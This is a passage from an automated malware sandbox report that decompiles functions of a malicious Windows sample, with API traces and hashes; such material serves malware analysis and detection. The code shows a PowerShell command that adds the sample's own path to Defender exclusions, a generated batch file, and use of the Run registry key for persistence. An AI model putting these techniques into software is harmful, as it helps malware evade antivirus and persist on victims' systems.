				 *_t18 = _t6;
				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				if(_t7 == 0) {
					 *_t18 =  *_t18 & _t7;
				}
				FindCloseChangeNotification(_t22); // executed
				return _t11;
			}










                                                                    0x02d21e24
                                                                    0x02d21e2d
                                                                    0x02d21e37
                                                                    0x02d21e4b
                                                                    0x02d21e4e
                                                                    0x02d21e54
                                                                    0x02d21e59
                                                                    0x02d21e5b
                                                                    0x02d21e5b
                                                                    0x02d21e61
                                                                    0x02d21e6c
                                                                    0x02d21e72
                                                                    0x02d21e7a
                                                                    0x02d21e7c
                                                                    0x02d21e7c
                                                                    0x02d21e7f
                                                                    0x02d21e8b

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
                                                                    • String ID:
                                                                    • API String ID: 2557216016-0
                                                                    • Opcode ID: 4c42b979ffad63a26e41416352a318dec270603125490fd2ae8e9759f701ce3d
                                                                    • Instruction ID: aab140bb40b7fe9cf833d243e0b8404f38a6c173fe04df785356922a651db60e
                                                                    • Opcode Fuzzy Hash: 4c42b979ffad63a26e41416352a318dec270603125490fd2ae8e9759f701ce3d
                                                                    • Instruction Fuzzy Hash: 46F0C2B2F41220BFF3205B65AC09FBB77ACEB64725F214625FD15E22C0E7B09D1486A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1FBFC Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E02D1FBFC() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}








                                                                    0x02d1fc06
                                                                    0x02d1fc0b
                                                                    0x02d1fc1d
                                                                    0x02d1fc21
                                                                    0x02d1fc25
                                                                    0x02d1fc33
                                                                    0x02d1fc3b
                                                                    0x02d1fc3b
                                                                    0x02d1fc43
                                                                    0x02d1fc48
                                                                    0x02d1fc48
                                                                    0x02d1fc57

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                    • String ID:
                                                                    • API String ID: 2406157124-0
                                                                    • Opcode ID: 1dd038728853389b002d1e13d9471b318a48e34c268fadb6a6facefc06a34217
                                                                    • Instruction ID: 005850d38100ba5a68e12184f8a4cb753133f2a186953d8ca7a58f634a757c5c
                                                                    • Opcode Fuzzy Hash: 1dd038728853389b002d1e13d9471b318a48e34c268fadb6a6facefc06a34217
                                                                    • Instruction Fuzzy Hash: FDF04972D00218FFDB209BA0DE09BDEBBB8EF04701F124465E901E6280D7309E58EA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D22FD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E02D22FD7(void* __ecx, void* __eflags) {
				int _t16;
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E02D11085(0x100);
				_t21 = E02D11085(0x100);
				E02D11052(_t22, 0, 0x100);
				E02D11052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100); // executed
				E02D1102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E02D11133("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E02D1102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E02D1102C(E02D11133(_t21) + _t21, _t2, 1);
				_t16 = WinExec(_t21, 0); // executed
				return _t16;
			}






                                                                    0x02d22fe6
                                                                    0x02d22ff1
                                                                    0x02d22ff3
                                                                    0x02d22ffc
                                                                    0x02d23008
                                                                    0x02d2301c
                                                                    0x02d23023
                                                                    0x02d23028
                                                                    0x02d23030
                                                                    0x02d23043
                                                                    0x02d2304e
                                                                    0x02d23057

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,745D0770,00000000,02D2364A), ref: 02D23008
                                                                    • WinExec.KERNEL32 ref: 02D2304E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateExecFileModuleNameProcess
                                                                    • String ID: powershell Add-MpPreference -ExclusionPath
                                                                    • API String ID: 1183730998-2194938034
                                                                    • Opcode ID: 425746706ce62d801f527317122d74783d3bb23b078e4c1a9772ad96268d3838
                                                                    • Instruction ID: 56198b9db15bec25e4b411ed1cc7ffa7d71b4674fa58748b2fcc18f005607403
                                                                    • Opcode Fuzzy Hash: 425746706ce62d801f527317122d74783d3bb23b078e4c1a9772ad96268d3838
                                                                    • Instruction Fuzzy Hash: 91F0F6B1E4021076E23032B1BCC9FBF5A9ECF99751F200421F70CB1780EA68DD0449B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21D35 Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 525 2d21d35-2d21d5a CreateFileA 526 2d21d73-2d21d77 525->526 527 2d21d5c-2d21d6d WriteFile FindCloseChangeNotification 525->527 527->526
                                                                    C-Code - Quality: 86%
                                                                    			E02D21D35(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t4;
				void* _t13;
				void* _t16;

				_push(__ecx);
				_t13 = __edx;
				_v8 = 0;
				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0); // executed
				_t16 = _t4;
				if(_t16 != 0xffffffff) {
					WriteFile(_t16, _t13, _a4,  &_v8, 0); // executed
					_t4 = FindCloseChangeNotification(_t16); // executed
				}
				return _t4;
			}







                                                                    0x02d21d38
                                                                    0x02d21d3e
                                                                    0x02d21d4c
                                                                    0x02d21d4f
                                                                    0x02d21d55
                                                                    0x02d21d5a
                                                                    0x02d21d66
                                                                    0x02d21d6d
                                                                    0x02d21d6d
                                                                    0x02d21d77

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,02D212E0,00000000,?,?), ref: 02D21D4F
                                                                    • WriteFile.KERNEL32(00000000,00000000,745D0770,00000000,00000000,?,02D212E0,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 02D21D66
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,02D212E0,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?,?,?), ref: 02D21D6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                    • String ID:
                                                                    • API String ID: 3805958096-0
                                                                    • Opcode ID: 7d6416827e264b2402cf10492a282f8f222b8b6dc874da12c29a2092ebdf752f
                                                                    • Instruction ID: 12d106c68f0431a74c40a3fff280ea5c1d121f0463382ca8a3444830d3d13589
                                                                    • Opcode Fuzzy Hash: 7d6416827e264b2402cf10492a282f8f222b8b6dc874da12c29a2092ebdf752f
                                                                    • Instruction Fuzzy Hash: 1EE09BB2501118BFE3111BD9EC88DEB7B6CDB953A8F114625F9159218092304D054674
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20BD9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 528 2d20bd9-2d20c1c call 2d11052 CreateProcessW 531 2d20c28 528->531 532 2d20c1e-2d20c26 528->532 533 2d20c2a-2d20c2d 531->533 532->533
                                                                    C-Code - Quality: 100%
                                                                    			E02D20BD9(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				int _t12;
				void** _t22;

				_t22 = __ecx;
				E02D11052( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t12 == 0) {
					return 0;
				}
				 *_t22 = _v20.hProcess;
				return 1;
			}







                                                                    0x02d20bea
                                                                    0x02d20bec
                                                                    0x02d20bfa
                                                                    0x02d20c14
                                                                    0x02d20c1c
                                                                    0x00000000
                                                                    0x02d20c28
                                                                    0x02d20c21
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: D
                                                                    • API String ID: 963392458-2746444292
                                                                    • Opcode ID: 816af88f412b4cd512c6dcf7e118e7880341ebe4fdcdf3750f4af8fcd178f3dd
                                                                    • Instruction ID: 0b654273d5ba3c11781bef68e51ca5c81a4fa61a670711374dc6dcc6e5791b75
                                                                    • Opcode Fuzzy Hash: 816af88f412b4cd512c6dcf7e118e7880341ebe4fdcdf3750f4af8fcd178f3dd
                                                                    • Instruction Fuzzy Hash: 97F030B2600219AFDB10DFE4D885DAB77BDEF54348B008825E6469B240E674DD0CCB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15A10 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 156sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15A10(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t86;
				void* _t97;
				void* _t101;
				void* _t105;
				void* _t109;
				intOrPtr* _t130;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr* _t192;
				void* _t193;

				_t193 = __eflags;
				_t179 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E02D2044F( &_v100, _t193);
				E02D20346( &_v100, E02D21CA2( &_v100)); // executed
				_t86 = E02D133BF( &_v12, ".bss"); // executed
				E02D202B9( &_v100,  &_v148, _t86); // executed
				E02D15EA5(_v12);
				E02D1304C( &_v16,  &_v108);
				E02D12E93(_t179 + 0x48,  &_v16);
				E02D13036( &_v16);
				E02D1595E(_t179,  &_v24);
				_t130 = _v24;
				_t188 =  *_t130;
				_t97 = E02D21DC0(_t130 + 4, _t188); // executed
				E02D13437(_t179 + 0x10, _t97); // executed
				E02D15EA5(_v12);
				_t20 = _t188 + 4; // 0x745d0774
				_t180 = _t20;
				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t130 + _t180));
				_t189 =  *((intOrPtr*)(_t130 + _t180 + 4));
				_t181 = _t180 + 8;
				_t101 = E02D21DC0(_t130 + _t181, _t189);
				_t28 = _v8 + 0x28; // 0x868ffff
				E02D13437(_t28, _t101);
				E02D15EA5(_v12);
				_t182 = _t181 + _t189;
				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t130 + _t182));
				_t190 =  *((intOrPtr*)(_t130 + _t182 + 1));
				_t183 = _t182 + 5;
				_t105 = E02D21DC0(_t130 + _t183, _t190); // executed
				_t38 = _v8 + 0x1c; // 0x8c8d5034, executed
				E02D13437(_t38, _t105); // executed
				E02D15EA5(_v12);
				_t184 = _t183 + _t190;
				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t130 + _t184));
				_t191 =  *((intOrPtr*)(_t130 + _t184 + 1));
				_t185 = _t184 + 5;
				_t109 = E02D21DC0(_t130 + _t185, _t191); // executed
				_t48 = _v8 + 0x24; // 0x1923e800, executed
				E02D13437(_t48, _t109); // executed
				E02D15EA5(_v12);
				_t186 = _t185 + _t191;
				_t192 = _v8;
				 *((intOrPtr*)(_t192 + 0x2c)) =  *((intOrPtr*)(_t130 + _t186));
				 *((intOrPtr*)(_t192 + 0x34)) =  *((char*)(_t130 + _t186 + 4));
				 *((intOrPtr*)(_t192 + 0x38)) =  *((char*)(_t130 + _t186 + 5));
				 *((intOrPtr*)(_t192 + 0x3c)) =  *((char*)(_t130 + _t186 + 6));
				 *((intOrPtr*)(_t192 + 0x40)) =  *((char*)(_t130 + _t186 + 7));
				 *((intOrPtr*)(_t192 + 0x44)) =  *((char*)(_t130 + _t186 + 8));
				E02D21DC0(_t130 + 4 + _t186 + 9,  *((intOrPtr*)(_t130 + _t186 + 9))); // executed
				_t72 = _t192 + 0x30; // 0x2d235ca, executed
				E02D13437(_t72,  &_v8); // executed
				 *_t192 = 1;
				 *((intOrPtr*)(_t192 + 4)) = 1;
				E02D15EA5(_v8);
				E02D13036( &_v24);
				E02D13036( &_v108);
				_t169 = _v56;
				if(_v56 != 0) {
					E02D11E71(_t169, _t169);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E02D13036( &_v76);
				return E02D1FEED( &_v100, 0);
			}


































                                                                    0x02d15a10
                                                                    0x02d15a1c
                                                                    0x02d15a23
                                                                    0x02d15a26
                                                                    0x02d15a2f
                                                                    0x02d15a3d
                                                                    0x02d15a4a
                                                                    0x02d15a5a
                                                                    0x02d15a62
                                                                    0x02d15a6e
                                                                    0x02d15a7a
                                                                    0x02d15a82
                                                                    0x02d15a8d
                                                                    0x02d15a92
                                                                    0x02d15a98
                                                                    0x02d15a9e
                                                                    0x02d15aa8
                                                                    0x02d15ab0
                                                                    0x02d15ab8
                                                                    0x02d15ab8
                                                                    0x02d15abe
                                                                    0x02d15ac4
                                                                    0x02d15ac8
                                                                    0x02d15acf
                                                                    0x02d15ad9
                                                                    0x02d15adc
                                                                    0x02d15ae4
                                                                    0x02d15aec
                                                                    0x02d15af2
                                                                    0x02d15af8
                                                                    0x02d15afc
                                                                    0x02d15b03
                                                                    0x02d15b0d
                                                                    0x02d15b10
                                                                    0x02d15b18
                                                                    0x02d15b20
                                                                    0x02d15b26
                                                                    0x02d15b2c
                                                                    0x02d15b30
                                                                    0x02d15b37
                                                                    0x02d15b41
                                                                    0x02d15b44
                                                                    0x02d15b4c
                                                                    0x02d15b51
                                                                    0x02d15b56
                                                                    0x02d15b5f
                                                                    0x02d15b67
                                                                    0x02d15b6f
                                                                    0x02d15b77
                                                                    0x02d15b7f
                                                                    0x02d15b8a
                                                                    0x02d15b92
                                                                    0x02d15b9c
                                                                    0x02d15b9f
                                                                    0x02d15baa
                                                                    0x02d15bac
                                                                    0x02d15baf
                                                                    0x02d15bb7
                                                                    0x02d15bbf
                                                                    0x02d15bc4
                                                                    0x02d15bc9
                                                                    0x02d15bcc
                                                                    0x02d15bcc
                                                                    0x02d15bd6
                                                                    0x02d15bd9
                                                                    0x02d15bdc
                                                                    0x02d15bdf
                                                                    0x02d15bf0

                                                                    APIs
                                                                    • Sleep.KERNEL32(000001F4,00000000,745D0770,00000000), ref: 02D15A26
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                                    • String ID: .bss
                                                                    • API String ID: 277671435-3890483948
                                                                    • Opcode ID: c60b9b9c6a6aafc75b7d53bb7afd979dbcf078cd6d358dd42841a595aacd8790
                                                                    • Instruction ID: 81a3937da53a5014b8caf83c0992c63855b730cba39b75a638644b7474f9f7eb
                                                                    • Opcode Fuzzy Hash: c60b9b9c6a6aafc75b7d53bb7afd979dbcf078cd6d358dd42841a595aacd8790
                                                                    • Instruction Fuzzy Hash: FE513E75904159AFCB14EFA0E9D08EEB7B6EF54304B6045AAC416AB745EF30AF05CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D13554 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E02D13554(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E02D131C3(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E02D13261(__ecx), 0, 0, 0, 0);
					_t12 = E02D15EB4(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E02D13261(_t36), _t12, _t35, 0, 0);
					_t15 = E02D133BF( &_v8, _t22); // executed
					E02D13125(_a4, _t15); // executed
					E02D15EA5(_v8);
					E02D15EA5(_t22);
				}
				return _a4;
			}








                                                                    0x02d13557
                                                                    0x02d1355f
                                                                    0x02d13562
                                                                    0x02d1356b
                                                                    0x02d13587
                                                                    0x02d1358b
                                                                    0x02d13595
                                                                    0x02d13598
                                                                    0x02d135ac
                                                                    0x02d135b6
                                                                    0x02d135bf
                                                                    0x02d135c7
                                                                    0x02d135ce
                                                                    0x02d135ce
                                                                    0x02d135d9

                                                                    APIs
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,02D14E98,?), ref: 02D13581
                                                                      • Part of subcall function 02D15EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D135AC
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 346377423-0
                                                                    • Opcode ID: 38dcc1d2bccbcef6844aad7792fba712e01645e0028f723dd87a7f838b9dd428
                                                                    • Instruction ID: 74a42cd7ffb7bb289ee98d6c53863b85cffc5ebed7e13a84e0db4bd750159077
                                                                    • Opcode Fuzzy Hash: 38dcc1d2bccbcef6844aad7792fba712e01645e0028f723dd87a7f838b9dd428
                                                                    • Instruction Fuzzy Hash: B20175B1B01220BBDF15BBA4EC85FAE776EDF49750F100465B906AB780CE746E008BB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D2106C Relevance: 3.0, APIs: 2, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D2106C(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E02D1F731(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E02D20FAE(_t23);
					goto L4;
				}
			}






                                                                    0x02d21073
                                                                    0x02d21076
                                                                    0x02d2107c
                                                                    0x02d210b1
                                                                    0x02d210bb
                                                                    0x02d210c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d2108c
                                                                    0x02d2108f
                                                                    0x02d210a8
                                                                    0x02d210c8
                                                                    0x00000000
                                                                    0x02d210c8
                                                                    0x02d210ac
                                                                    0x00000000
                                                                    0x02d210ac

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNEL32(745D0770,00000000,00000000,02D235AB,?,?,?,02D235AB,?,02D2158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D210BB
                                                                      • Part of subcall function 02D1F731: RegOpenKeyExW.ADVAPI32(745D0770,00000000,00000000,00020019,00000000,745D0770,?,02D21088,?,?,02D235AB,?,02D2158B,80000001,?,000F003F), ref: 02D1F747
